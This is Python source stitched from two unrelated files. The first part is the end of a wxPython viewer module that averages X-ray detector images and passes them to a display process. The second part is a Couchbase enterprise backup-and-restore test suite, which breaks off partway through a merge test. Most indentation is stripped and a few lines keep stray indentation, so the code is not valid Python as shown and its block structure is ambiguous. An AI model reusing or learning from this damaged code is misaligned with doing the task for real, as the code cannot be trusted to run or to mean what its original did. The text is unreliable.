self._next_semaphore.release()
def send_data(self, img, title):
"""The send_data() function updates the wxPython application with
@p img and @p title by sending it an ExternalUpdateEvent(). The
function blocks until the event is processed."""
from rstbx.viewer.frame import ExternalUpdateEvent
event = ExternalUpdateEvent()
event.img = img
event.title = title
if self.isAlive():
try:
# Saturating the event queue makes the whole caboodle
# uselessly unresponsive. Therefore, block until idle events
# are processed.
while self.isAlive() and not self._run_pause.IsToggled():
pass
self._frame.AddPendingEvent(event)
self._is_idle = False
while self.isAlive() and not self._is_idle:
pass
except Exception:
pass
def setup_toolbar(self, toolbar):
import wx
from wxtbx import icons
toolbar.ClearTools()
btn = toolbar.AddLabelTool(
id=wx.ID_ANY,
label="Settings",
bitmap=icons.advancedsettings.GetBitmap(),
shortHelp="Settings",
kind=wx.ITEM_NORMAL)
self._frame.Bind(wx.EVT_MENU, self._frame.OnShowSettings, btn)
btn = toolbar.AddLabelTool(
id=wx.ID_ANY,
label="Zoom",
bitmap=icons.search.GetBitmap(),
shortHelp="Zoom",
kind=wx.ITEM_NORMAL)
self._frame.Bind(wx.EVT_MENU, self._frame.OnZoom, btn)
# Reset the normal bitmap after the tool has been created, so that
# it will update on the next event. See also OnPauseRun()
self._run_pause = toolbar.AddCheckLabelTool(
id=wx.ID_ANY,
label="Run/Pause",
bitmap=self._bitmap_run,
shortHelp="Run/Pause")
self._run_pause.SetNormalBitmap(self._bitmap_pause)
self._frame.Bind(wx.EVT_MENU, self.OnPauseRun, self._run_pause)
def OnIdle(self, event):
self._is_idle = True
event.RequestMore()
def OnPauseRun(self, event):
if self._run_pause.IsToggled():
self._run_pause.SetNormalBitmap(self._bitmap_run)
else:
self._run_pause.SetNormalBitmap(self._bitmap_pause)
def stop(self):
from wx import CloseEvent
self._frame.AddPendingEvent(CloseEvent())
def _xray_frame_process(queue, linger=True, wait=None):
"""The _xray_frame_process() function starts the viewer in a
separate thread. It then continuously reads data from @p queue and
dispatches update events to the viewer. The function returns when
it reads a @c None object from @p queue or when the viewer thread
has exited.
"""
from Queue import Empty
import rstbx.viewer
# Start the viewer's main loop in its own thread, and get the
# interface for sending updates to the frame.
thread = _XrayFrameThread()
send_data = thread.send_data
while True:
try:
payload = queue.get(timeout=1)
if payload is None:
if linger:
thread.join()
else:
thread.stop()
return
if not thread.isAlive():
thread.join()
return
if wait is not None:
time.sleep(wait)
# All kinds of exceptions--not just PyDeadObjectError--may occur
# if the viewer process exits during this call. XXX This may be
# dangerous!
try:
send_data(rstbx.viewer.image(payload[0]), payload[1])
except Exception:
pass
except Empty:
pass
class mod_view(common_mode.common_mode_correction):
"""XXX
"""
def __init__(self,
address,
n_collate = None,
n_update = 120,
common_mode_correction = "none",
wait=None,
photon_counting=False,
sigma_scaling=False,
**kwds):
"""The mod_view class constructor XXX.
@param address Full data source address of the DAQ device
@param calib_dir Directory with calibration information
@param common_mode_correction The type of common mode correction to apply
@param dark_path Path to input average dark image
@param dark_stddev Path to input standard deviation dark
image, required if @p dark_path is given
@param wait Minimum time (in seconds) to wait on the current
image before moving on to the next
@param n_collate Number of shots to average, or <= 0 to
average all shots
@param n_update Number of shots between updates
"""
super(mod_view, self).__init__(
address=address,
common_mode_correction=common_mode_correction,
**kwds)
self.detector = cspad_tbx.address_split(address)[0]
self.nvalid = 0
self.ncollate = cspad_tbx.getOptInteger(n_collate)
self.nupdate = cspad_tbx.getOptInteger(n_update)
self.photon_counting = cspad_tbx.getOptBool(photon_counting)
self.sigma_scaling = cspad_tbx.getOptBool(sigma_scaling)
if (self.ncollate is None):
self.ncollate = self.nupdate
if (self.ncollate > self.nupdate):
self.ncollate = self.nupdate
self.logger.warning("n_collate capped to %d" % self.nupdate)
linger = True # XXX Make configurable
wait = cspad_tbx.getOptFloat(wait)
# Create a managed FIFO queue shared between the viewer and the
# current process. The current process will produce images, while
# the viewer process will consume them.
manager = multiprocessing.Manager()
self._queue = manager.Queue()
self._proc = multiprocessing.Process(
target=_xray_frame_process, args=(self._queue, linger, wait))
self._proc.start()
self.n_shots = 0
def event(self, evt, env):
"""The event() function is called for every L1Accept transition.
XXX Since the viewer is now running in a parallel process, the
averaging here is now the bottleneck.
@param evt Event data object, a configure object
@param env Environment object
"""
from pyana.event import Event
self.n_shots += 1
super(mod_view, self).event(evt, env)
if evt.status() != Event.Normal or evt.get('skip_event'): # XXX transition
return
# Get the distance for the detectors that should have it, and set
# it to NaN for those that should not.
if self.detector == 'CxiDs1' or \
self.detector == 'CxiDsd' or \
self.detector == 'XppGon':
distance = cspad_tbx.env_distance(self.address, env, self._detz_offset)
if distance is None:
self.nfail += 1
self.logger.warning("event(): no distance, shot skipped")
evt.put(skip_event_flag(), "skip_event")
return
else:
distance = float('nan')
if not self._proc.is_alive():
evt.setStatus(Event.Stop)
# Early return if the next update to the viewer is more than
# self.ncollate shots away. XXX Since the common_mode.event()
# function does quite a bit of processing, the savings are
# probably not so big.
    next_update = (self.nupdate - 1) - (self.n_shots - 1) % self.nupdate
if (self.ncollate > 0 and next_update >= self.ncollate):
return
if self.sigma_scaling:
self.do_sigma_scaling()
if self.photon_counting:
self.do_photon_counting()
# Trim the disabled section from the Sc1 detector image. XXX This
# is a bit of a kludge, really.
# if (self.address == "CxiSc1-0|Cspad2x2-0"):
# self.cspad_img = self.cspad_img[185:2 * 185, :]
# Update the sum of the valid images, starting a new collation if
# appropriate. This guarantees self.nvalid > 0.
if (self.nvalid == 0 or self.ncollate > 0 and self.nvalid >= self.ncollate):
self.img_sum = self.cspad_img
self.nvalid = 1
else:
self.img_sum += self.cspad_img
self.nvalid += 1
# Update the viewer to display the current average image, and
# start a new collation, if appropriate.
if (next_update == 0):
from time import localtime, strftime
time_str = strftime("%H:%M:%S", localtime(evt.getTime().seconds()))
title = "r%04d@%s: average of %d last images on %s" \
% (evt.run(), time_str, self.nvalid, self.address)
# See also mod_average.py.
device = cspad_tbx.address_split(self.address)[2]
if device == 'Cspad':
beam_center = self.beam_center
pixel_size = cspad_tbx.pixel_size
saturated_value = cspad_tbx.cspad_saturated_value
elif device == 'marccd':
beam_center = tuple(t // 2 for t in self.img_sum.focus())
pixel_size = 0.079346
saturated_value = 2**16 - 1
# Wait for the viewer process to empty the queue before feeding
# it a new image, and ensure not to hang if the viewer process
# exits. Because of multithreading/multiprocessing semantics,
# self._queue.empty() is unreliable.
fmt = _Format(BEAM_CENTER=beam_center,
DATA=self.img_sum / self.nvalid,
DETECTOR_ADDRESS=self.address,
DISTANCE=distance,
PIXEL_SIZE=pixel_size,
SATURATED_VALUE=saturated_value,
TIME_TUPLE=cspad_tbx.evt_time(evt),
WAVELENGTH=self.wavelength)
while not self._queue.empty():
if not self._proc.is_alive():
evt.setStatus(Event.Stop)
return
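    # Retry the put with a short timeout; the queue was just drained above,
    # so this normally succeeds on the first attempt.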
while True:
try:
self._queue.put((fmt, title), timeout=1)
break
except Exception:
pass
if (self.ncollate > 0):
self.nvalid = 0
#signature for pyana:
#def endjob(self, env):
#signature for psana:
#def endjob(self, evt, env):
def endjob(self, obj1, obj2=None):
"""The endjob() function terminates the viewer process by sending
it a @c None object, and waiting for it to finish.
@param evt Event object (psana only)
@param env Environment object
"""
if obj2 is None:
env = obj1
else:
evt = obj1
env = obj2
super(mod_view, self).endjob(env)
try:
self._queue.put(None)
except Exception:
pass
self.logger.info("endjob(): end of stream")
self._proc.join()
|
enterprise_backup_restore_test.py
|
import re
import copy
import json
from random import randrange, randint
from threading import Thread
from Cb_constants import constants
from couchbase_helper.cluster import Cluster
from membase.helper.rebalance_helper import RebalanceHelper
from couchbase_helper.documentgenerator import BlobGenerator, DocumentGenerator
from ent_backup_restore.enterprise_backup_restore_base import EnterpriseBackupRestoreBase
from membase.api.rest_client import RestConnection, RestHelper
from BucketLib.bucket import Bucket
from membase.helper.bucket_helper import BucketOperationHelper
from pytests.query_tests_helper import QueryHelperTests
from remote.remote_util import RemoteUtilHelper, RemoteMachineShellConnection
from security.auditmain import audit
from security.rbac_base import RbacBase
from upgrade.newupgradebasetest import NewUpgradeBaseTest
from couchbase.bucket import Bucket
from couchbase_helper.document import View
from eventing.eventing_base import EventingBaseTest
from tasks.future import TimeoutError
from xdcr.xdcrnewbasetests import NodeHelper
from couchbase_helper.stats_tools import StatsCommon
from testconstants import COUCHBASE_DATA_PATH, WIN_COUCHBASE_DATA_PATH, \
COUCHBASE_FROM_4DOT6, ENT_BKRS, ENT_BKRS_FTS
AUDITBACKUPID = 20480
AUDITRESTOREID = 20485
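# Connection parameters used as the sourceParams of the full-text index
# definition below (INDEX_DEFINITION); the index is created against the
# default bucket in test_backup_with_rbac when create_fts_index is set.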
SOURCE_CB_PARAMS = {
"authUser": "default",
"authPassword": "",
"authSaslUser": "",
"authSaslPassword": "",
"clusterManagerBackoffFactor": 0,
"clusterManagerSleepInitMS": 0,
"clusterManagerSleepMaxMS": 20000,
"dataManagerBackoffFactor": 0,
"dataManagerSleepInitMS": 0,
"dataManagerSleepMaxMS": 20000,
"feedBufferSizeBytes": 0,
"feedBufferAckThreshold": 0
}
INDEX_DEFINITION = {
"type": "fulltext-index",
"name": "",
"uuid": "",
"params": {},
"sourceType": "couchbase",
"sourceName": "default",
"sourceUUID": "",
"sourceParams": SOURCE_CB_PARAMS,
"planParams": {}
}
class EnterpriseBackupRestoreTest(EnterpriseBackupRestoreBase, NewUpgradeBaseTest, EventingBaseTest):
def setUp(self):
super(EnterpriseBackupRestoreTest, self).setUp()
self.users_check_restore = \
self.input.param("users-check-restore", '').replace("ALL", "*").split(";")
if '' in self.users_check_restore:
self.users_check_restore.remove('')
for server in [self.backupset.backup_host, self.backupset.restore_cluster_host]:
conn = RemoteMachineShellConnection(server)
conn.extract_remote_info()
conn.terminate_processes(conn.info, ["cbbackupmgr"])
conn.disconnect()
self.bucket_helper = BucketOperationHelper()
def tearDown(self):
super(EnterpriseBackupRestoreTest, self).tearDown()
def test_backup_create(self):
self.backup_create_validate()
def test_backup_restore_sanity(self):
"""
1. Create default bucket on the cluster and loads it with given number of items
2. Perform updates and create backups for specified number of times (test param number_of_backups)
3. Perform restores for the same number of times with random start and end values
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self.log.info("*** start to load items to all buckets")
self._load_all_buckets(self.master, gen, "create", self.expires)
self.log.info("*** done to load items to all buckets")
self.ops_type = self.input.param("ops-type", "update")
self.expected_error = self.input.param("expected_error", None)
if self.auto_failover:
self.log.info("Enabling auto failover on " + str(self.backupset.cluster_host))
rest_conn = RestConnection(self.backupset.cluster_host)
rest_conn.update_autofailover_settings(self.auto_failover, self.auto_failover_timeout)
self.backup_create_validate()
for i in range(1, self.backupset.number_of_backups + 1):
if self.ops_type == "update":
self.log.info("*** start to update items in all buckets")
self._load_all_buckets(self.master, gen, "update", self.expires)
self.log.info("*** done update items in all buckets")
elif self.ops_type == "delete":
self.log.info("*** start to delete items in all buckets")
self._load_all_buckets(self.master, gen, "delete", self.expires)
self.log.info("*** done to delete items in all buckets")
self.sleep(10)
self.log.info("*** start to validate backup cluster")
self.backup_cluster_validate()
self.targetMaster = True
start = randrange(1, self.backupset.number_of_backups + 1)
if start == self.backupset.number_of_backups:
end = start
else:
end = randrange(start, self.backupset.number_of_backups + 1)
self.log.info("*** start to restore cluster")
restored = {"{0}/{1}".format(start, end): ""}
for i in range(1, self.backupset.number_of_backups + 1):
if self.reset_restore_cluster:
self.log.info("*** start to reset cluster")
self.backup_reset_clusters(self.cluster_to_restore)
if self.same_cluster:
self._initialize_nodes(Cluster(), self.servers[:self.nodes_init])
else:
self._initialize_nodes(Cluster(), self.input.clusters[0][:self.nodes_init])
self.log.info("Done reset cluster")
self.sleep(10)
""" Add built-in user cbadminbucket to second cluster """
self.add_built_in_server_user(node=self.input.clusters[0][:self.nodes_init][0])
self.backupset.start = start
self.backupset.end = end
self.log.info("*** start restore validation")
self.backup_restore_validate(compare_uuid=False,
seqno_compare_function=">=",
expected_error=self.expected_error)
if self.backupset.number_of_backups == 1:
continue
while "{0}/{1}".format(start, end) in restored:
start = randrange(1, self.backupset.number_of_backups + 1)
if start == self.backupset.number_of_backups:
end = start
else:
end = randrange(start, self.backupset.number_of_backups + 1)
restored["{0}/{1}".format(start, end)] = ""
def test_backup_restore_after_rebalance(self):
"""
1. Create default bucket on the cluster and loads it with given number of items
2. Does a rebalance on cluster to be backed up with specified number of servers in (test param nodes_in) and
servers out (test param nodes_out)
3. Takes a backup
4. Does a rebalance on cluster to be restored to with specified number of servers in (test param nodes_in) and
servers out (test param nodes_out)
5. Performs a restore on the restore cluster
"""
serv_in = self.servers[self.nodes_init:self.nodes_init + self.nodes_in]
serv_out = self.servers[self.nodes_init - self.nodes_out:self.nodes_init]
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create_validate()
self.backupset.number_of_backups = 1
rebalance = self.cluster.async_rebalance(self.cluster_to_backup, serv_in, serv_out)
rebalance.result()
self.backup_cluster_validate()
if not self.same_cluster:
self._initialize_nodes(Cluster(), self.input.clusters[0][:self.nodes_init])
serv_in = self.input.clusters[0][self.nodes_init: self.nodes_init + self.nodes_in]
serv_out = self.input.clusters[0][self.nodes_init - self.nodes_out: self.nodes_init]
rebalance = self.cluster.async_rebalance(self.cluster_to_restore, serv_in, serv_out)
else:
rebalance = self.cluster.async_rebalance(self.cluster_to_restore, serv_out, serv_in)
rebalance.result()
self.backup_restore_validate(compare_uuid=False, seqno_compare_function="<=")
def test_backup_restore_with_rebalance(self):
"""
1. Create default bucket on the cluster and loads it with given number of items
2. Does a rebalance on cluster to be backed up with specified number of servers in (test param nodes_in) and
servers out (test param nodes_out)
3. Takes a backup while rebalance is going on
4. Does a rebalance on cluster to be restored to with specified number of servers in (test param nodes_in) and
servers out (test param nodes_out)
5. Performs a restore on the restore cluster while rebalance is going on
"""
serv_in = self.servers[self.nodes_init:self.nodes_init + self.nodes_in]
serv_out = self.servers[self.nodes_init - self.nodes_out:self.nodes_init]
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create_validate()
self.backupset.number_of_backups = 1
self.cluster.async_rebalance(self.cluster_to_backup, serv_in, serv_out)
self.sleep(10)
self.backup_cluster_validate()
if not self.same_cluster:
self._initialize_nodes(Cluster(), self.input.clusters[0][:self.nodes_init])
serv_in = self.input.clusters[0][self.nodes_init: self.nodes_init + self.nodes_in]
serv_out = self.input.clusters[0][self.nodes_init - self.nodes_out: self.nodes_init]
self.cluster.async_rebalance(self.cluster_to_restore, serv_in, serv_out)
else:
self.cluster.async_rebalance(self.cluster_to_restore, serv_out, serv_in)
self.sleep(10)
self.backup_restore_validate(compare_uuid=False, seqno_compare_function="<=")
def test_backup_restore_with_ops(self):
"""
1. Create default bucket on the cluster and loads it with given number of items
2. Perform the specified ops (test param ops-type) and create backups for specified number of times
(test param number_of_backups)
3. Perform restores for the same number of times with random start and end values
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
initial_gen = copy.deepcopy(gen)
initial_keys = []
for x in initial_gen:
initial_keys.append(x[0])
self.log.info("Start to load items to all buckets")
self._load_all_buckets(self.master, gen, "create", 0)
self.ops_type = self.input.param("ops-type", "update")
self.log.info("Create backup repo ")
self.backup_create()
for i in range(1, self.backupset.number_of_backups + 1):
self._backup_restore_with_ops()
start = randrange(1, self.backupset.number_of_backups + 1)
if start == self.backupset.number_of_backups:
end = start
else:
end = randrange(start, self.backupset.number_of_backups + 1)
if self.compact_backup and self.ops_type == "delete":
self.log.info("Start to compact backup ")
self.backup_compact_validate()
self.log.info("Validate deleted keys")
self.backup_compact_deleted_keys_validation(initial_keys)
self.log.info("start restore cluster ")
restored = {"{0}/{1}".format(start, end): ""}
for i in range(1, self.backupset.number_of_backups + 1):
self.backupset.start = start
self.backupset.end = end
self._backup_restore_with_ops(backup=False, compare_function=">=")
if self.backupset.number_of_backups == 1:
continue
while "{0}/{1}".format(start, end) in restored:
start = randrange(1, self.backupset.number_of_backups + 1)
if start == self.backupset.number_of_backups:
end = start
else:
end = randrange(start, self.backupset.number_of_backups + 1)
restored["{0}/{1}".format(start, end)] = ""
def _backup_restore_with_ops(self, exp=0, backup=True, compare_uuid=False,
compare_function="==", replicas=False,
mode="memory", node=None, repeats=0,
validate_directory_structure=True):
self.ops_type = self.input.param("ops-type", "update")
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size,
end=self.num_items)
self.log.info("Start doing ops: %s " % self.ops_type)
if node is None:
node = self.master
self._load_all_buckets(node, gen, self.ops_type, exp)
if backup:
self.backup_cluster_validate(repeats=repeats,
validate_directory_structure=validate_directory_structure)
else:
self.backup_restore_validate(compare_uuid=compare_uuid,
seqno_compare_function=compare_function,
replicas=replicas, mode=mode)
def test_backup_list(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backup and validates it
3. Executes list command on the backupset and validates the output
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster_validate()
self.backup_list_validate()
def test_backup_list_optional_switches(self):
"""
1. Creates specified buckets on the cluster and loads it with given number of items
Note: this test should be run with 2 buckets
2. Creates two backupsets
3. Creates two backups on each of the backupset
4. Executes list command with --name and validates
5. Executes list command with --name and --incr-backup and validates
6. Executes list command with --name, --incr-backup and --bucket-backup and validates
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self._take_n_backups(n=2)
self.backupset.name = "backup2"
self.backup_create(del_old_backup=False)
self._take_n_backups(n=2)
incr_names = 0
backup_name = False
self.backupset.backup_list_name = "backup"
status, output, message = self.backup_list()
if not status:
self.fail(message)
for line in output:
if self.backupset.backup_list_name in line:
backup_name = True
if self.backups[0] in line:
incr_names += 1
if self.backups[1] in line:
incr_names += 1
self.assertTrue(backup_name, "Expected backup name not found in output")
self.log.info("Expected backup name found in output")
self.assertEqual(incr_names, 2, "Expected backups were not listed for --name option")
self.log.info("Expected backups listed for --name option")
incr_names = 0
backup_name = False
self.backupset.backup_list_name = "backup2"
status, output, message = self.backup_list()
if not status:
self.fail(message)
for line in output:
if self.backupset.backup_list_name in line:
backup_name = True
if self.backups[2] in line:
incr_names += 1
if self.backups[3] in line:
incr_names += 1
self.assertTrue(backup_name, "Expected backup name not found in output")
self.log.info("Expected backup name found in output")
self.assertEqual(incr_names, 2, "Expected backups were not listed for --name option")
self.log.info("Expected backups listed for --name option")
buckets = 0
name = False
self.backupset.backup_list_name = "backup"
self.backupset.backup_incr_backup = self.backups[0]
status, output, message = self.backup_list()
if not status:
self.fail(message)
for line in output:
if self.backupset.backup_incr_backup in line:
name = True
if self.buckets[0].name in line:
buckets += 1
if self.buckets[1].name in line:
buckets += 1
self.assertTrue(name, "Expected incremental backup name not found in output")
self.log.info("Expected incrmental backup name found in output")
self.assertEqual(buckets, 2, "Expected buckets were not listed for --incr-backup option")
self.log.info("Expected buckets were listed for --incr-backup option")
name = False
items = 0
self.backupset.backup_list_name = "backup2"
self.backupset.backup_incr_backup = self.backups[2]
self.backupset.bucket_backup = self.buckets[0].name
status, output, message = self.backup_list()
if not status:
self.fail(message)
for line in output:
if self.buckets[0].name in line:
name = True
if "shard" in line:
split = line.split(" ")
split = [s for s in split if s]
items += int(split[1])
self.assertTrue(name, "Expected bucket not listed for --bucket-backup option")
self.log.info("Expected bucket listed for --bucket-backup option")
self.assertEqual(items, self.num_items, "Mismatch in items for --bucket-backup option")
self.log.info("Expected number of items for --bucket-backup option")
def test_list_with_large_number_of_backups(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a large number of backups
3. Executes list command on the backupset and validates the output
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self._take_n_backups(n=25)
status, output, message = self.backup_list()
if not status:
self.fail(message)
backup_count = 0
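        # Each backup directory is named with a timestamp of the form
        # YYYY-MM-DDTHH_MM_SS.ffffff-HH_MM, which the regex below matches.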
for line in output:
if re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+-\d{2}_\d{2}", line):
backup_name = re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+-\d{2}_\d{2}", line).group()
if backup_name in self.backups:
backup_count += 1
self.log.info("{0} matched in list command output".format(backup_name))
self.assertEqual(backup_count, len(self.backups), "Number of backups did not match")
self.log.info("Number of backups matched")
def _take_n_backups(self, n=1, validate=False):
for i in range(1, n + 1):
if validate:
self.backup_cluster_validate()
else:
self.backup_cluster()
def test_backup_compact(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backup and validates it
3. Executes compact command on the backupset and validates the output
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster_validate()
self.backup_compact_validate()
def test_backup_with_purge_interval_set_to_float(self):
"""
cbbackupmgr should handle case with purge interval set to float number
return: None
"""
purgeInterval = 1.5
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self.log.info("Set purge interval to float value '%s'" % purgeInterval)
rest = RestConnection(self.backupset.cluster_host)
status, content = rest.set_purge_interval_and_parallel_compaction(purgeInterval)
if status:
self.log.info("Done set purge interval value '%s'" % purgeInterval)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster_validate()
self.backup_restore_validate()
else:
self.fail("Failed to set purgeInterval value")
def test_restore_from_compacted_backup(self):
"""
1. Creates specified bucket on the cluster and loads it with given number of items
2. Creates a backup and validates it
3. Executes compact command on the backupset
4. Restores from the compacted backup and validates it
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backup_cluster_validate()
self.backup_compact()
self.backup_restore_validate()
def test_backup_with_compress_flag(self):
"""
1. Load docs into bucket
2. Backup without compress flag
3. Get backup data size
4. Delete backup repo
5. Do backup again with compress flag
6. Compare those data if it flag works
:return: None
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size,
end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.backupset.backup_compressed = False
self.backup_cluster()
no_compression = self.get_database_file_info()
self.log.info("\nDelete old backup and do backup again with compress flag")
self.backup_create()
self.backupset.backup_compressed = self.input.param("backup-compressed", False)
self.backup_cluster()
with_compression = self.get_database_file_info()
self.validate_backup_compressed_file(no_compression, with_compression)
def test_backup_restore_with_credentials_env(self):
"""
password will pass as in env variable
:return: None
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size,
end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
output, error = self.backup_cluster()
if output and not self._check_output("Backup successfully completed", output):
self.fail("Failed to run with password env %s " % output)
self.backup_cluster_validate(skip_backup=True)
self.backup_list()
self.backup_restore_validate()
def test_backup_with_update_on_disk_of_snapshot_markers(self):
"""
This test is for MB-25727 (using cbbackupwrapper)
        Remove this test once cbbackupwrapper is dropped.
No default bucket, default_bucket=false
Create bucket0
Load 100K items to bucket0
Stop persistence on server via cbepctl
Load another 100K items.
Run full backup with cbbackupwrapper
Load another 100K items.
Run diff backup. Backup process will hang with error in memcached as shown above
:return: None
"""
gen1 = BlobGenerator("ent-backup1", "ent-backup-", self.value_size, end=100000)
gen2 = BlobGenerator("ent-backup2", "ent-backup-", self.value_size, end=100000)
gen3 = BlobGenerator("ent-backup3", "ent-backup-", self.value_size, end=100000)
rest_conn = RestConnection(self.backupset.cluster_host)
rest_conn.create_bucket(bucket="bucket0", ramQuotaMB=1024)
self.buckets = rest_conn.get_buckets()
authentication = "-u Administrator -p password"
self._load_all_buckets(self.master, gen1, "create", 0)
self.log.info("Stop persistent")
cluster_nodes = rest_conn.get_nodes()
clusters = copy.deepcopy(cluster_nodes)
shell = RemoteMachineShellConnection(self.backupset.backup_host)
for node in clusters:
shell.execute_command("%scbepctl%s %s:%s -b %s stop %s" % \
(self.cli_command_location,
self.cmd_ext,
node.ip,
constants.memcached_port,
"bucket0",
authentication))
shell.disconnect()
self.log.info("Load 2nd batch docs")
self._load_all_buckets(self.master, gen2, "create", 0)
self.log.info("Run full backup with cbbackupwrapper")
shell = RemoteMachineShellConnection(self.backupset.backup_host)
backup_dir = self.tmp_path + "backup" + self.master.ip
shell.execute_command("rm -rf %s" % backup_dir)
shell.execute_command("mkdir %s" % backup_dir)
shell.execute_command("cd %s;./cbbackupwrapper%s http://%s:8091 %s -m full %s"
% (self.cli_command_location, self.cmd_ext,
self.backupset.cluster_host.ip,
backup_dir,
authentication))
self.log.info("Load 3rd batch docs")
self._load_all_buckets(self.master, gen3, "create", 0)
self.log.info("Run diff backup with cbbackupwrapper")
output, _ = shell.execute_command("cd %s;./cbbackupwrapper%s http://%s:8091 %s -m diff %s"
% (self.cli_command_location, self.cmd_ext,
self.backupset.cluster_host.ip,
backup_dir,
authentication))
if output and "SUCCESSFULLY COMPLETED" not in output[1]:
self.fail("Failed to backup as the fix in MB-25727")
shell.disconnect()
def test_cbrestoremgr_should_not_change_replica_count_in_restore_bucket(self):
"""
This test is for MB-25809
Set default_bucket=False
Create bucket with 1 replica
Load 10K items to bucket
Backup data from bucket
Create other bucket with 2 replicas in other cluster
Restore data to bucket with 2 replicas
Verify data and bucket setting. It must retain 2 replicas
:return: None
"""
gen = BlobGenerator("ent-backup", "ent-backup-", self.value_size, end=10000)
if not self.new_replicas:
self.fail("This test needs to pass param 'new-replicas' to run")
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self.log.info("Start backup cluster")
self.backup_cluster_validate()
self.backup_restore_validate()
self.log.info("replicas from backup bucket: {0}".format(self.num_replicas))
self.log.info("replica in restore bucket should be {0} after restore"\
.format(self.new_replicas))
rest_r = RestConnection(self.backupset.restore_cluster_host)
for bucket in self.buckets:
bucket_stats = rest_r.get_bucket_json(bucket.name)
if self.new_replicas != bucket_stats["replicaNumber"]:
self.fail("replia number in bucket {0} did change after restore"\
.format(bucket.name))
self.log.info("Verified replica in bucket {0}: {1}"\
.format(bucket.name,
bucket_stats["replicaNumber"]))
def test_restore_with_invalid_bucket_config_json(self):
"""
When bucket-config.json in latest backup corrupted,
The merge backups should fail.
1. Create a bucket and load docs into it.
2. Create a backup and validate it.
3. Run full backup
4. Load more docs into bucket
5. Run backup (incremental) and verify.
6. Modify backup-config.json to make invalid json in content
7. Run restore to other bucket, restore should fail with error
"""
gen = BlobGenerator("ent-backup_1", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_create()
self._take_n_backups(n=self.backupset.number_of_backups)
status, output, message = self.backup_list()
if not status:
self.fail(message)
backup_count = 0
for line in output:
if re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+-\d{2}_\d{2}", line):
backup_name = re.search("\d{4}-\d{2}-\d{2}T\d{2}_\d{2}_\d{2}.\d+-\d{2}_\d{2}",
line).group()
if backup_name in self.backups:
backup_count += 1
self.log.info("{0} matched in list command output".format(backup_name))
backup_bucket_config_path = self.backupset.directory + "/backup" + \
"/" + self.backups[self.backupset.number_of_backups - 1] + \
"/" + self.buckets[0].name + "-*" \
"/bucket-config.json"
remote_client = RemoteMachineShellConnection(self.backupset.backup_host)
self.log.info("Remore } in bucket-config.json to make it invalid json ")
remote_client.execute_command("sed -i 's/}//' %s " % backup_bucket_config_path)
self.log.info("Start to merge backup")
self.backupset.start = randrange(1, self.backupset.number_of_backups)
self.backupset.end = randrange(self.backupset.start + 1,
self.backupset.number_of_backups + 1)
result, output, _ = self.backup_merge()
if result:
self.log.info("Here is the output from command %s " % output[0])
self.fail("merge should failed since bucket-config.json is invalid")
remote_client.disconnect()
def test_restore_with_non_exist_bucket(self):
"""
1. Create a bucket A
2. Load docs to bucket A
3. Do backup bucket A
4. Delete bucket A
        5. Restore to bucket A (non-existent bucket)
        6. Expect errors to be thrown
"""
gen = BlobGenerator("ent-backup1_", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.log.info("Start doing backup")
self.backup_create()
self.backup_cluster()
self.log.info("Start to delete bucket")
BucketOperationHelper.delete_all_buckets_or_assert([self.master], self)
output, _ = self.backup_restore()
if output and "Error restoring cluster" not in output[0]:
self.fail("Restore to non exist bucket should fail")
def test_merge_backup_from_old_and_new_bucket(self):
"""
1. Create a bucket A
2. Load docs with key 1
3. Do backup
4. Delete bucket A
5. Re-create bucket A
6. Load docs with key 2
7. Do backup
8. Do merge backup. Verify backup only contain docs key 2
"""
gen = BlobGenerator("ent-backup1_", "ent-backup-", self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen, "create", 0)
self.log.info("Start doing backup")
self.backup_create()
self.backup_cluster()
if self.bucket_delete:
self.log.info("Start to delete bucket")
BucketOperationHelper.delete_all_buckets_or_assert([self.master], self)
BucketOperationHelper.create_bucket(serverInfo=self.master, test_case=self)
elif self.bucket_flush:
self.log.info("Start to flush bucket")
self.bucket_util.flush_all_buckets(self.cluster)
gen = BlobGenerator("ent-backup2_", "ent-backup-", self.value_size, end=self.num_items)
self.log.info("Start to load bucket again with different key")
self._load_all_buckets(self.master, gen, "create", 0)
self.backup_cluster()
self.backupset.number_of_backups += 1
status, output, message = self.backup_list()
if not status:
self.fail(message)
self.log.info("Start to merge backup")
